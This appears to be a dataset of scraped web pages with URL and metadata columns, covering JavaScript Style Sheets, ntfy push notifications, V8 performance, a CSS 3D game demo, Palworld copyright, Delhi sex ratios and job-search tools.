marginTop = "4cm";
}
</style>
```
Similar to Cascading Style Sheets, JSSS could be used in a `<style>` tag. This example shows two different methods to select tags.
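Netscape's submission also described `classes` and `ids` objects for the class and id selectors mentioned above. The sketch below approximates that syntax; the exact property paths are an approximation of the submission rather than verified Netscape 4 behaviour:

```
<style type="text/javascript">
// all elements with class="punk", whatever their tag name
classes.punk.all.color = "green";
// only <P> elements with class="punk"
classes.punk.P.fontStyle = "italic";
// the single element with id="intro"
ids.intro.letterSpacing = "0.3em";
</style>
```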
## Browser support
JavaScript Style Sheets were only supported by Netscape 4.x (4.0–4.8), not by any later version. No other web browser has ever integrated JSSS.
## References
1. Håkon Wium Lie; Bert Bos. "Chapter 20 - The CSS saga". World Wide Web Consortium. Retrieved 23 June 2010.
| true | true | true | null |
2024-10-12 00:00:00
|
2005-02-20 00:00:00
| null |
website
|
wikipedia.org
|
Wikimedia Foundation, Inc.
| null | null |
23,467,281 |
https://medium.com/@yagiz/14-ways-to-become-a-better-technical-manager-leader-7b57324c2a6d
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,627,072 |
https://www.putorius.net/dnf-history.html
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
32,377,801 |
https://www.r-bloggers.com/2022/08/unravelling-an-enormous-json/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
1,395,521 |
http://www.gonegoogle.com/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,173,675 |
http://cloud-elements.com/post-effyouthisistherighturl-restful-api-design/
|
Cloud Elements | API Integration Platform | 200+ Prebuilt Integrations
| null |
# We joined the UiPath family.
Read the press release, or visit the site to learn more.
Read the Press Release Visit UiPath
### Customer Resources
Although we’ve joined the UiPath family, we still want to offer current Cloud Elements customers the ability to access the same resources, including API docs, Cloud Elements University, Support, and the Cloud Elements Community. Access each resource below.
Have a sales question or other inquiry? As a new member of the UiPath family, we ask that you visit the UiPath contact page to find answers to questions about our products, use cases, pricing, and implementation for your business.
| true | true | true |
Cloud Elements is the leading API integration platform for SaaS app providers and the digital enterprise. Turn integration into your competitive advantage.
|
2024-10-12 00:00:00
|
2016-10-13 00:00:00
|
website
|
cloud-elements.com
|
Cloud Elements | API Integration Platform | iPaaS
| null | null |
|
11,048,206 |
https://point2625.appspot.com/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
20,584,821 |
https://www.reddit.com/r/networking/comments/ckpaem/apple_thunderbolt_monitor_kills_network/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
24,199,545 |
https://www.theverge.com/2020/8/17/21372846/microsoft-cant-uninstall-microsoft-edge-web-browser-editorial
|
Microsoft’s ‘can’t uninstall Microsoft Edge’ support page is hilariously telling
|
Sean Hollister
|
Look, I’m sure that the new Microsoft Edge is a fantastic web browser. I’m looking forward to trying it someday.
But Microsoft, I have a piece of advice for you: if so very many Windows users are googling “Can’t uninstall Microsoft Edge” that you feel the need to *utterly own* that search result by making it the title of your FAQ... maybe just don’t force it on Windows users to begin with?
Here’s a screenshot of the new support page, for posterity:
To be clear, I’m not saying Microsoft *shouldn’t* have updated users to the new version of Edge, particularly after today’s announcement that Internet Explorer and legacy Edge will be fully phased out exactly one year from now. Continued security updates are important!
But instead of telling users what effectively boils down to “you can’t uninstall it because we decided not to let you,” perhaps Microsoft could take a hint and give users what they apparently want. Here’s how Google search volume for “uninstall Microsoft Edge” has evolved in recent months:
By the way, you apparently *can* still get rid of the new Edge. (Strange how Microsoft’s page omits that.) You’ll just have to be comfortable with a few shell commands.
| true | true | true |
Maybe the company should take a hint?
|
2024-10-12 00:00:00
|
2020-08-17 00:00:00
|
article
|
theverge.com
|
The Verge
| null | null |
|
748,823 |
http://blog.assembla.com/assemblablog/tabid/12618/bid/10041/Distributed-Agile-Interview-Dan-Mezick-chats-with-Andy-Singleton.aspx
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,599,562 |
https://www.sfchronicle.com/california/article/klamath-dams-salmon-die-off-18700078.php
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
29,249,545 |
https://ntfy.sh/
|
ntfy.sh | Push notifications to your phone or desktop via PUT/POST
| null |
# Push notifications made easy
**ntfy** (pronounced *notify*) is a simple HTTP-based pub-sub notification service. It allows you to send notifications to your phone or desktop via scripts from any computer, and/or using a REST API. It's infinitely flexible, and 100% free software.
## Send push notifications from your app or script
Publishing messages can be done via PUT or POST. Topics are created on the fly by subscribing or publishing to them. If you use ntfy without sign-up, the topic is essentially a password, so pick something that's not easily guessable. If you purchase ntfy Pro, you can reserve topic names instead.
```
curl \
-d "Backup successful 😀" \
ntfy.sh/mytopic
```
## Receive notifications on your phone
Subscribe to a topic and receive notifications, with different priorities, attachments, action buttons, tags & emojis, and even for automation.
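Richer messages are published by adding HTTP headers to the same call shown above. The header names below (`Title`, `Priority`, `Tags`) follow ntfy's documented options, but treat this as a sketch to check against the docs rather than a complete reference:

```
curl \
    -H "Title: Disk space low" \
    -H "Priority: high" \
    -H "Tags: warning" \
    -d "Only 500MB left on /backups" \
    ntfy.sh/mytopic
```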
## Or get notified on your computer
You can use the web app to subscribe to topics as well. If you do, notifications will pop up as desktop notifications. Simply type in the topic name and click the Subscribe button. The browser will keep a connection open and listen for incoming notifications.
## Integrate with your favorite tools
Publishing messages is just a HTTP request, so pretty much everything under the sun can integrate with ntfy.
changedetection.io, healthchecks.io
Whether it's receiving alerts from cronjobs, or when a GitHub Actions pipeline finishes, or when a new episode of your TV show is available, or when any website has a change ❤️, ntfy will let you know.
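For example, a cronjob can report its outcome with nothing more than the publish call shown earlier; the script path and topic name here are placeholders:

```
#!/bin/sh
# Run the nightly backup and push the result to ntfy (topic name is an example).
if /usr/local/bin/backup.sh; then
    curl -d "Nightly backup succeeded" ntfy.sh/mybackups
else
    curl -d "Nightly backup FAILED" ntfy.sh/mybackups
fi
```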
## Pricing
Try ntfy for free without sign-up, or check out our paid plans. Or, since it's open source, you can always self-host it.
### Supporter
$5/ month
Get started with ntfy, while also supporting the open source project.
### Pro
$10/ month
This is the best value plan. Lots of messages, and large attachments.
### Business
$20/ month
Insane amount of messages, lots of reserved topics, giant attachments.
Need a bigger plan, or a dedicated server? Feel free to contact us.
If you don't need a paid plan, but would still like to support us, please donate via **GitHub Sponsors** or **Liberapay** ❤️.
## “Hands down the best notification service I've ever used, and I have used them all.”
– Joe Harrison
#### Still not convinced?
Check out the countless blog posts and newspaper articles about ntfy, or read all the reviews on Google Play and the App Store.
## Join our open source community
ntfy is open source, and dual-licensed under the Apache 2.0 and GPLv2 license. Development happens out in the open, on GitHub and in our chats on Discord/Matrix. We love free software, and we're doing this because it's fun. Please join us, and let us know how you are using ntfy!
## ntfy is proudly sponsored by …
And by many open source lovers across the globe via**GitHub Sponsors** or **Liberapay** ❤️.
Want to **become a sponsor**?
Feel free to contact us, and we'll chat.
| true | true | true |
ntfy is a simple HTTP-based pub-sub notification service. It allows you to send notifications to your phone or desktop via scripts from any computer, and/or using a REST API.
|
2024-10-12 00:00:00
|
2024-01-01 00:00:00
|
/static/img/ntfy.png
|
website
|
ntfy.sh
|
ntfy.sh
| null | null |
1,477,616 |
http://torgronsund.wordpress.com/2010/06/29/essential-startup-5-new-killer-startup-decks/
|
Essential Startup: 5 Killer Startup Decks
| null |
Planning versus execution often poses a dilemma for startup founders. So instead of reading a pile of books on the subject, you might as well get started with some killer ideas at hand. Recently I shared a list of 6 Essential Startup Decks. Here I continue the Essential Startup series, sharing 5 decks that I believe can aid in entrepreneurial pursuits.
**Finding Product / Market Fit: introducing the PMF matrix**
Since being introduced by Marc Andreessen and popularized by the Lean Startup movement, Product-Market Fit has become a big deal in tech entrepreneurship. Several bloggers have addressed the subject lately, yet as a concept Product-Market Fit has been missing its a-picture-says-more-than-1000-words moment. Earlier I suggested the Product-Market Fit diagram. Here Rishi Dean presents the Product-Market Matrix, aligned with Customer Development and Lean Startup methodologies.
**The UX Driven Startup**
What to do as a founder when you actually can’t build things? Say no more, Alexa Andrzejewski, founder of Foodspotting, gives you a memorable pitch on how to craft an experience vision at startup.
**Why fighter pilots run startups**
Originator of Customer Development and serial entrepreneur Steve Blank shares an arsenal of great ideas on entrepreneurship, including Customer Development, Lean Startup, business model validation, market types, the pivot and the OODA Loop. Perhaps one of his most encompassing slide decks.
**Continuous Deployment at kaChing**
From a more technical perspective than the remainder of this list, Pascal-Louis Perez gives us an introduction to, and examples of, continuous deployment at a startup. I am a strong believer in his statement “Release is a marketing concern”, which I also covered in What’s in a Startup Methodology, giving an example of Spotify’s beta releases.
**Product Management 101 for Startups**
I enjoyed Dan Olson‘s talk on Lean Product Management for Web 2.0 Products at web 2.0 Expo earlier this year. His recent slide deck includes a section on What is Product Management, as well as covering subjects a such as Product-Market fit, value proposition, usability, the pivot, and continuous improvement together with a case study.
In continuing the Essential Startup series I appreciate any tips on killer startup decks, tools and ideas.
**Did you like this post? **Please, feel free to subscribe or follow me on Twitter.
Hey Tor – thanks for the reference!
I have a newer version of the Product / Market Fit deck on Slideshare, based on a lot of feedback I received (including yours):
The New Rules Of Early Stage Product Development, from Rishi Dean. The corresponding blogpost is forthcoming, and I will let you know when I post.
Thanks again!
Rishi
http://rishidean.com
Hi Rishi,
I really enjoy reading these slides. Good progress 🙂
Talking “pre-chasm”, to what extent do you see that the first chasm between innovators and early adopters (the one before the main chasm) aligns with achieving product-market fit?
I am looking forward to the post.
Cheers, Tor
Pingback: Today’s Startup and Entrepreneurial Updates
Pingback: Today’s Startup and Entrepreneurial Updates | atomicgate.com
| true | true | true |
Planning versus execution often makes a dilemma to startup founders. So instead of reading a pile of books on the subject you might as well getting started with some killer ideas at hand. Recently …
|
2024-10-12 00:00:00
|
2010-06-29 00:00:00
|
article
|
wordpress.com
|
The Methodologist
| null | null |
|
14,104,724 |
https://blog.chromium.org/2017/04/real-world-javascript-performance.html
|
Real-world JavaScript performance
|
Google
|
The V8 JavaScript engine is a cornerstone of fast browsing in Chrome. Over the course of the past year, the V8 team has developed a new method for measuring performance against snapshots of real web pages. Using insights from real-world measurements, the V8 team improved the speed of the average page load in Chrome by 10-20% over the course of the past year.
Historically, JavaScript engines such as V8 used benchmarks like Octane to improve the “peak” performance of JavaScript, or the performance of CPU-intensive script in hot loops. At the beginning of last year, the V8 team started to measure performance with higher fidelity by instrumenting snapshots of popular web pages such as Reddit, Twitter, Facebook, and Wikipedia. This analysis revealed that while peak performance benefits certain types of large web applications, browsing typical websites relies more on “startup” performance, or the speed it takes to start running script. Using insights gleaned from this real-world performance data, the V8 team implemented optimizations which improved mean page load between Chrome 49 and Chrome 56 by 10-20%, depending on CPU architecture.
The web page snapshots also enabled analysis of the differences between various benchmarks and real web workloads. Although no benchmark can be a representative proxy for all sites, the Speedometer benchmark is an approximation of many sites due to its inclusion of real web frameworks including React, Angular, Ember, and jQuery. This similarity can be seen in the startup optimizations above, which also yielded a 25-35% improvement in Chrome’s Speedometer score. Conversely, comparing page snapshots to Octane revealed that Octane was a poor approximation of most websites. Given the plateau of Octane scores across web browsers and the over-optimization of peak performance, we decided to retire the benchmark as a general-purpose measure of real-world JavaScript performance.
V8 performance optimizations improved Chrome's Speedometer score by 25-35% over the past year
Going forward, we plan to ship more JavaScript performance improvements for new patterns of script appearing on the web, including modern libraries, frameworks, and ES2015+ language features. By measuring real-world websites rather than traditional benchmarks, we can better optimize JavaScript patterns that matter most to users and developers. Stay tuned for updates about our new engine architecture, designed for real-world performance.
Posted by Seth Thompson, V8 Track Commentator
| true | true | true |
The V8 JavaScript engine is a cornerstone of fast browsing in Chrome. Over the course of the past year, the V8 team has developed a new me...
|
2024-10-12 00:00:00
|
2017-04-12 00:00:00
|
https://lh3.googleusercontent.com/jKkzIw-KViX-5TzyXy64YhJ6hR1wR71g9XuDX-2uI7IoTT9lnkAJvUdm04TA0BafidGZMu6uGANzSyiGrcqmfQ2NteMXOGo5oZZffcQDosGhf4N3ivWNfyjQrmU9Ls4SMVhcp_eN=w1200-h630-p-k-no-nu
|
article
|
chromium.org
|
Chromium Blog
| null | null |
27,073,515 |
https://github.com/beclamide/gta-css
|
GitHub - beclamide/gta-css: I made a Grand Theft Auto style demo in CSS 3D (as much as possible) because I'm an idiot with far too much free time.
|
Beclamide
|
Play the demo here: https://rainbow-dolphin-0e2aae.netlify.app
I made this demo just to see how powerful CSS 3D actually is, and I got a bit carried away...
I was also curious to see how good CSS is for making computer games.
I wanted to try to keep as much of the visual stuff within CSS as possible and use JS only for game logic.
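For context, the core CSS 3D machinery boils down to a perspective container, `transform-style: preserve-3d`, and 3D transforms on the children. This is a generic sketch of those building blocks, not code taken from this repo:

```
/* Generic CSS 3D building blocks - not from this project */
.scene {
  perspective: 800px;           /* distance of the virtual camera */
}
.world {
  transform-style: preserve-3d; /* children keep their 3D positions */
  transform: rotateX(60deg);    /* tilt the ground plane away from the camera */
}
.building {
  transform: translate3d(200px, 100px, 0) rotateZ(15deg); /* place and turn an object */
}
```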
Clone the repo locally.
This was built with Node 10.13. If you're using NVM, make sure you run `nvm use` before installing.
```
$ npm install
$ npm run serve
```
Open a browser and go to `http://localhost:8080`
| Action | Keys |
| --- | --- |
| Accelerate | Up Arrow |
| Brake | Down Arrow |
| Steer Left/Right | Left/Right Arrows |
There are now mobile controls too!
I've added a slide deck that goes along with my talk (video link to be added later). The slides explain some of the process and development of the demo.
Open a browser and go to `http://localhost:8080/slides.html`
| true | true | true |
I made a Grand Theft Auto style demo in CSS 3D (as much as possible) because I'm an idiot with far too much free time. - beclamide/gta-css
|
2024-10-12 00:00:00
|
2021-03-22 00:00:00
|
https://repository-images.githubusercontent.com/350397553/d7d18d80-8b3e-11eb-9e42-c227da7c439d
|
object
|
github.com
|
GitHub
| null | null |
25,975,284 |
https://twitter.com/Wisdom1Original
|
x.com
| null | null | true | true | false | null |
2024-10-12 00:00:00
| null | null | null | null |
X (formerly Twitter)
| null | null |
39,165,049 |
https://www.technollama.co.uk/palworld-pokemon-and-copyright-infringement
|
Palworld, Pokémon, and copyright infringement
| null |
A game called Palworld is taking the world by storm. This title has garnered 8 million downloads on Steam in less than 6 days, it also has become the second game in Steam history to hit over 2 million concurrent players. The game is a monster-collection-base-defence-crafting mash-up, you catch creatures (named Pals) to either fight or work for you collecting materials to build items and your base, they also help you defeat other Pals with guns, or weaken them enough so that you can capture them. Everyone who plays the game seems to love it, and I’ve heard from people who’ve played it that it’s delightfully bonkers and addictive. Not my cup of tea, but I may try it after I get through Baldur’s Gate 3 (yes, I’m late to that particular party).
So players love it, and it’s selling like hotcakes, so why am I writing about it? Well, if you’re on certain corners of Twitter, your opinion of the game would be quite negative. It started with accusations of the game depicting slavery and animal cruelty (the capture and killing bit), then it got accused of using artificial intelligence to generate Pals, and then it got attacked for blatantly stealing character designs and assets from Pokémon. Agreement quickly grew on the perennially angry and outraged cesspit that is Twitter that Palworld was not good, and should be boycotted.
And yet the game continues to thrive regardless, it’s almost as if Twitter’s opinion doesn’t count, but I digress.
I can’t comment on the accusations of animal cruelty other than to point out that people should learn to distinguish between games and reality. The claims regarding AI appear to be entirely related to previous activities from developers (one of them likes AI, gasp!), and have nothing to do with the actual game, which started being developed 3 years ago, well before the current generative AI boom. There’s a pernicious tendency on Twitter to denounce anything that has even a hint of AI even without evidence, but facts never stopped a good witch-hunt. What has interested me the most have been the claims that Palworld is potentially engaged in copyright infringement. So, is it?
Right from the start, there is clearly a common element in both games, Pokémon is a game where you capture creatures using pokéballs and get them to fight for you against other trainers in a turn-based system. In Palworld there is indeed a creature-capture mechanic that uses a ball as a device, but that’s where all gameplay similarities end, the creatures fight with guns, and they also have other practical uses, you can give them instructions to perform tasks for you, and you can also use others as means of transportation.
What has raised more questions have been some of the Pals, there are now several articles that compare Pals and Pokémon, and there cannot be any doubt that there are quite a few that look very similar, although others share a passing resemblance in some elements (links here and here). The similarity is enough to continue fuelling the controversy, with people calling for Nintendo to sue Pocket Pair, the game’s developer. So, is this copyright infringement?
It depends. Yes, I know this is a lawyerly cop-out, but in this case it may be quite fitting. There are quite a few things to remember here. The first is that when it comes to computer games, there’s quite a lot of copying of concepts already, you can find games that are pretty much clones of others, and the amount of cross-pollination in some genres is considerable. There’s almost never direct copying of code, so any infringement suit already has to contend with an industry that is keen on borrowing ideas from other properties. And I use the word “idea” here on purpose, copyright does not protect an idea, it protects the expression of that idea, so you cannot protect the idea of first person shooters, or even the idea of monster-catching games. The second consideration is the gameplay itself, which in this case is very different, so Nintendo wouldn’t have a claim on that side, I can’t see the capture element being subject to protection alone (too much idea), and anyway Pokémon did not invent that concept, that honour goes to the 80s game Megami Tensei. And even some of the Pokémon are inspired by Japanese myths and culture, as well as having borrowed heavily from character design from games such as Dragon Quest. However, it is the character design of the Pals where Pokémon could have a stronger copyright infringement claim. The legal question will rest on just how similar the designs are, and whether they cross the line into substantial similarity: it’s not only necessary that there is a resemblance between two characters, but that the similarity has to be substantial.
This will be a matter for a court to decide, I can definitely see some similarities, but this will depend a lot on expert witnesses. I have seen a few threads and speculation that Palworld may have directly copied digital assets from Pokémon games, this would definitely be a considerable boost for a potential Nintendo lawsuit if proven true. I will not even begin to assess those claims, I am entirely unqualified to do so, but current speculation is futile until this gets to court, if it ever does.
Why would Nintendo not initiate legal action? I think that a suit is possible, but unlikely. Here are my reasons in a convenient bullet-point format:
- Most Twitter commentary has been based on speculation and a complete misunderstanding of copyright law, so it can be ignored entirely, the only opinion that matters is Nintendo’s.
- Palworld is not infringing trademarks, none of the Pals share a name with their Pokémon counterparts (fun fact, only the most famous Pokémon are protected by trademarks), so this will rest entirely on character copyright, which may be more difficult to prove.
- Not all Pals are similar to Pokémon, and there is a varying degree of similarity, making the case less of a slam dunk one, and more likely to be either settled or negotiated (more on that later).
- Forum matters. Most of the legal commentary has been centred on the United States, which is common online, but still drives me up the wall. Pokémon is an IP owned jointly by three Japanese companies, Creature, Game Freak, and Nintendo. Pocket Pair, the Palworld developer, is also a Japanese company. So why would they sue in US courts when all of the parties are Japanese? One could argue that Palworld is distributed by Valve (the makers of the gaming platform Steam), which is a US company, but unless Nintendo plans on also suing Valve (which makes no sense), then I just cannot see this happening. Moreover, suing anywhere else could open the suit to be dismissed under the forum non conveniens doctrine.
- Pokémon has a history of borrowing characters and concepts from earlier games, so initiating a lawsuit could shine a light on the argument that some Pokémon lack originality themselves, or that they are just generic versions of existing animals: pigeons, birds, foxes, cats, fiery lizards…
- Palworld has been in development for three years, with trailers dating back as far as two years ago. Nintendo should have seen this coming, and could have stopped it before release. Why didn’t they? Could it be that their lawyers aren’t 100% sure of success?
**Edit:** Could there be a parody exception here? It would be interesting to know how Japanese law handles parodies in copyright.
So should Nintendo sit this one out? I don’t think so. Pokémon is one of the most valuable media empires in the world, and having a game that is practically being advertised by people as “Pokémon with guns” could tarnish their reputation. But then again, it may not, Pokémon will remain a strong IP regardless of what happens with Palworld. My guess is that copyright litigation is not the way to go here, why not negotiate some sort of licensing agreement with Palworld behind the scenes? Why not even embrace the new direction presented by this game? Nintendo could become a partner, and allow Pokémon to actually exist in Palworld. I would actually start playing Palworld if I could take Pikachu on a hunting expedition with guns. Give me a playable Flareon with a flame thrower. Please take my money!
**Concluding**
So I don’t think that anyone should be rushing to defend Nintendo on social media, they’re more than capable of taking a decision of whether or not to sue the makers of Palworld on their own. But one thing has become clear to me, Twitter’s capacity to generate angry mobs continues unabated, but it’s evident that these are powerless when it comes to the real world. Consumers are not on Twitter, and if the game is fun, they will buy it.
I’ll leave you as I’m off to buy Baldur’s Gate 3, what should I play, a sorcerer or a wizard? Decisions, decisions.
**Edit:** I’ve been watching quite a lot of gameplay on Youtube, and I’m increasingly convinced that Nintendo will have a difficult time in an infringement suit, the game is so much more than a Pokémon clone, I can see why it’s so addictive.
**Edit September 2024:** So Nintendo has sued Pocket Pair, not for copyright, but patent infringement. Looks like software patents are back on the menu, boys.
## 34 Comments
## Anonymous · January 28, 2024 at 8:58 pm
I’m afraid that could be the case in the future if similatrieies go to the point of “(Pal) looks, not joking, exactly in design like (Pokemon), No differences at all!”
## Anonymous · January 29, 2024 at 12:16 am
None of the pal world characters look nothing alike and that’s coming from someone who has played all of the Pokemon games has 10k pokemon cards as well why can’t people just play the damn game and enjoy it stop complaining about it just enjoy it
## Anonymous · January 29, 2024 at 11:08 am
Nintendo would have sued straight away if any laws were being broken they are not idiots they have pricey lawyers
## Anonymous · February 1, 2024 at 2:13 pm
Nah they knew about it since 3 yrs ago they just dont have enough evidence to win the lawsuit
## Anonymous · January 29, 2024 at 12:50 pm
Google pal world cobalion.
## Anonymous · February 5, 2024 at 3:08 am
They might be similar but they aren’t copies and most of the similar ones are based of common animals like wolves, foxes, and sheep so the lawsuit prob won’t do anything
## Anonymous · February 1, 2024 at 2:15 pm
I dont think u played pokemon enough you should return everything. I clearly see the sprites and skeletons being close to pokemon and ive been playing pokemon ever since the original red and blue version
## Anonymous · March 1, 2024 at 9:21 pm
Hmm I agree have been playing pokemon since pokemon lets go sun and moon game
## Anonymous · February 4, 2024 at 9:37 pm
the pokemon (cobalion) tell me it doesnt look the same as in pokemon if you say no then it must be yugioh or digimon you have played all games of and the cards must be dual masters or something
## Anonymous · February 10, 2024 at 8:52 pm
Some of them do. This just proves you haven’t played one of them. The characters are copied from Pokemon. These are facts
## Just Me · January 29, 2024 at 2:01 am
You normally do not file for copyright until after the product is released. Why sue a company with a little bit of money when you can sue a company that made money off of copyrighting your content. I am not saying they do have a winning argument I am just stating any attorney would tell you to wait until product is release so it doesn’t disappear and also so there is more money to be made from law suit.
## Anonymous · February 1, 2024 at 2:20 pm
I think hes right about ppl misunderstanding what lawsuits mean. You arent supposed to wait for the infringer to make money to pay the lawsuit as whatever amount will be decided upon court decision. Also its an idea like patent infringement i think nintendo lawyers didnt have enough evidence to go after them and have 100% win rate. Dunno why they would start now based on twitter forums.
## Anonymous · February 4, 2024 at 10:02 pm
with copyright you sue the soon as possible, why because if you let time pass you are giving the impresion you dont care about your product
## Anonymous · January 29, 2024 at 8:22 pm
Warlock
## Andres Guadamuz · January 30, 2024 at 12:42 pm
Created a sorcerer first.
## Anonymous · January 31, 2024 at 4:32 pm
Best call ngl, a good Warlock buddy is Wyll tho
## Alex · January 30, 2024 at 4:00 pm
My guess is what will happen:
Nintendo will punk check them with a lawsuit threat.
Palworld will respond with an update where they fix the likeness of the characters in question
Case will be dropped
Honestly I wouldn’t be surprised if they make a partnership like they did with Pokémon Go. In the end they both want to make money, a partnership would just skyrocket their profits.
I’m all for sticking it to large corporations. But these laws are in place to protect large and small businesses. Because essentially based on everyone’s logic I could make my own subway. Call it subdown, change a couple menu items a little bit, and change the colors of the logo. Emotion because you like the game doesn’t mean you should disregard laws put in place.
Although I would love to see animals file a class action lawsuit against Pokémon.
## Anonymous · February 1, 2024 at 2:23 pm
Or they could make them not look like pokemon. They knew their customers wanted pokemon and obviously they did it on purpose. Any idiot can see its a different colored eevee..
## Anonymous · February 2, 2024 at 1:49 pm
This dumb dribble is not even purposeful. You are telling me with the 1000+Pokémon there are that nobody can ever make an animated creature capture game ever. Your dumb.
## Anonymous · February 7, 2024 at 11:39 am
You’re
## Anonymous · January 31, 2024 at 5:48 pm
pokemon but with guns hehe
## Anonymous · February 1, 2024 at 2:26 pm
In the original pokemon manga they always had guns, even the original animation team rocket jesse and james had rockets but funimation started censoring and changing everything to make it kid friendly. If you also play the pokemon games it has pokedex info saying pokemon eat kids, people eat pokemon etc.
## Anonymous · February 1, 2024 at 2:52 pm
Does anyone have a list of the copyrighted pokemon, everywhere else I read says that all the pokemon are trademarked
## Anonymous · February 7, 2024 at 11:41 am
Truth is Nintendo are salty they could never make a game like Pal due to their obsession with keeping things kid friendly..
## Anonymous · March 17, 2024 at 4:23 pm
Not to mention that they’re mad someone did a better job than them at something they think they have a monopoly over.
## Anonymous · February 12, 2024 at 12:25 am
All I got from this is that the author hates twitter. Cheap shots every other sentence. Were you a victim of the culling when ownership changed? Moving on.
## Anonymous · March 1, 2024 at 9:23 pm
Don’t get me wrong, I love Palworld, it’s a great game. I’m also a big Pokemon fan; they’re both great games. Honestly I think Nintendo should not sue Palworld.
## Anonymous · February 1, 2024 at 2:30 pm
Tem Tem, nexomon, and all the other pokemon clones had the same pokeball system but the difference between them and palworld is they used different sprites that dont look like pokemon. Nintendo should ask for a fee to borrow from them but i dont think it stole the branding
## Anonymous · February 14, 2024 at 6:19 pm
Nintendo and the Pokémon Company would have to tread lightly if they went the “it looks similar in design to Pokémon” route. It could easily backfire on them since there are Pokémon designs that are practically copies from creatures of other series.
## Palworld, Pokémon, and copyright infringement - TechnoLlama - Pokémon News · January 28, 2024 at 6:06 pm
[…] Right from the start, there is clearly a common element in both games, Pokémon is a game where you capture creatures using pokéballs and get them to …View full source […]
## 幻獸帕魯、寶可夢及著作權侵權 – 智潮集 · January 31, 2024 at 8:19 am
[…] Original link: Palworld, Pokémon, and copyright infringement […]
## PR in Action #3 – MKTG214 – Spencer Moore MKTG214 Blog · February 2, 2024 at 8:45 pm
[…] Palworld, Pokémon, and copyright infringement […]
## Pokémon vs Palworld: Parody or Plagiarism? – Game Researcher · February 11, 2024 at 10:25 pm
[…] Nintendo itself has commented on the game, with some people hoping that they would sue the game for copyright infringement. It seems unlikely that that will happen though, as the game was announced a couple years ago, and […]
## Copyright Clash: PalWorld, Pokémon, And The Gaming Industry · February 17, 2024 at 4:27 pm
[…] Legal issues surrounding PalWorld and Pokémon […]
| true | true | true |
A game called Palworld is taking the world by storm. This title has garnered 8 million downloads on Steam in less than 6 days, it also has become the second game in Steam history to hit over 2 mill…
|
2024-10-12 00:00:00
|
2024-01-27 00:00:00
|
article
|
technollama.co.uk
|
TechnoLlama
| null | null |
|
13,860,154 |
https://stanfy.com/blog/facebook-messenger-bots-interactions/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,020,652 |
http://shkspr.mobi/blog/2013/01/sex-ratios-in-delhi/
|
Sex Ratios in Delhi
|
· Statistics ·
|
# Sex Ratios in Delhi
There are no words to adequately describe the horrific rape and murder of Jyoti Singh Pandey.
I remember, several years ago, reading a short piece of speculative fiction which postulated that China would go to war over access to women. Generations of female infanticide would leave the country with a severe gender imbalance. Hordes of men would be unable to find a wife, would become violent, and would lead their country into bitter conflicts with other countries in order to capture their women.
A simplistic approach, perhaps. There are many perceived consequences of an unchecked male population growth. But gender imbalance stemming from female infanticide is a real problem around the world.
The Indian Census has released some very detailed statistics for the country's population. This chart shows the male:female ratio in Delhi.
Now, there are several reasons why there may be fewer women than men in Delhi. Economic migration may play a part for example. What we can look at with some accuracy is the birth rate.
In most human societies, more boys are born than girls. In 2011, the global sex ratio was 984 females per 1,000 males.
In India, the rate is 940.
In Delhi? It's 866.
In *rural* Delhi? 809.
Delhi has 1.2 million more men than women.
By way of comparison, in the UK as a whole there are 970 males to every 1,000 females (according to the ONS mid-2007 population estimates). Of course, the UK doesn't have an exemplary record when it comes to sex crimes.
There are many factors behind the continued harassment of women around the world. I don't want to appear to be an apologist for sexual violence, or to single this out as the sole cause of these shameful crimes. However, I can't help but wonder whether populations with such unhealthy sex ratios provide an environment that fosters a truly terrible attitude towards women.
## Niblettes says:
There are historical precedents for the problems inherent in demographic gender imbalance. The Chinese call these extra men bare branches. There is a really good article here (it's a PDF):
http://www.hcs.harvard.edu/~hapr/winter07_gov/hudson.pdf
| true | true | true |
There are no words to adequately describe the horrific rape and murder of Jyoti Singh Pandey. I remember, several years ago reading a short piece of speculative fiction which postulated that China would go to war over access to women. Generations of female infanticide would leave the country with a severe gender imbalance. Hoards of […]
|
2024-10-12 00:00:00
|
2013-01-07 00:00:00
|
article
|
shkspr.mobi
|
Terence Eden’s Blog
| null | null |
|
13,967,051 |
https://www.nytimes.com/2017/03/19/technology/lawyers-artificial-intelligence.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,765,030 |
http://insights.dice.com/2015/06/23/handy-tools-for-streamlining-your-job-search/
|
Handy Tools for Streamlining Your Job Search
|
Leslie Stevens-Huffman
|
Job hunting can be so time-consuming, it’s practically a full-time job unto itself. To do it right, you need to promote your brand, research companies, customize resumes and stay on top of your contacts and activity. Fortunately, there are plenty of Web tools, plugins and mobile apps to streamline the process. Here are a few that make job hunting easier and faster:
### Resume Optimizers
Do you waste time applying for jobs that aren’t a good fit? Does your resume have a knack for disappearing into black holes? Using online tools such as
Jobscan or
Resunate can alleviate at least some of those problems. Jobscan uses an applicant tracking system (ATS) algorithm to rank the match between your resume’s content and a job posting, explained James Hu, the firm’s co-founder and CEO. If your resume receives a low score, you can either modify its contents to get past the ATS or choose to pursue a more suitable position. “Jobscan cuts the time needed for resume tailoring in half because you can see at a glance the keywords or job titles you need to add or change,” he said. You can save even more time by using
Pocket Resume or
Resume Maker On-the-Go to change out your resume’s keywords right from your mobile device.
### Organizers
Following up after you submit your resume can set you apart from the competition. Whether you prefer browser extenders, mobile apps or Web tools, there’s always a handy implement to jog your memory and keep tabs on your activity.
44score is a browser extender that keeps track of applications and other paperwork, and reminds you when it’s time to follow up.
JibberJobber and
jobaware offer similar functionality (as well as online and mobile versions). Other options include
Startwire, which claims to be America’s number one job-search organizer, and
JobHero, which integrates with most major job boards including Dice. If you’re looking for a mobile solution, check out
GoodWire. Of course, you can adapt almost any CRM tool to manage your activity. Hu recommends
Streak, a Gmail plugin that lets you track resume submittals, phone screens and interviews right from your inbox.
### Brand Builders
If pounding the digital pavement seems fruitless, why not make it easy for employers and recruiters to find you? Having a strong online presence elevates your brand and catches the eye of recruiters who look for candidates on the Internet. However, unless you happen to be a Web developer, building a personal website or portfolio from scratch can prove a daunting endeavor. With
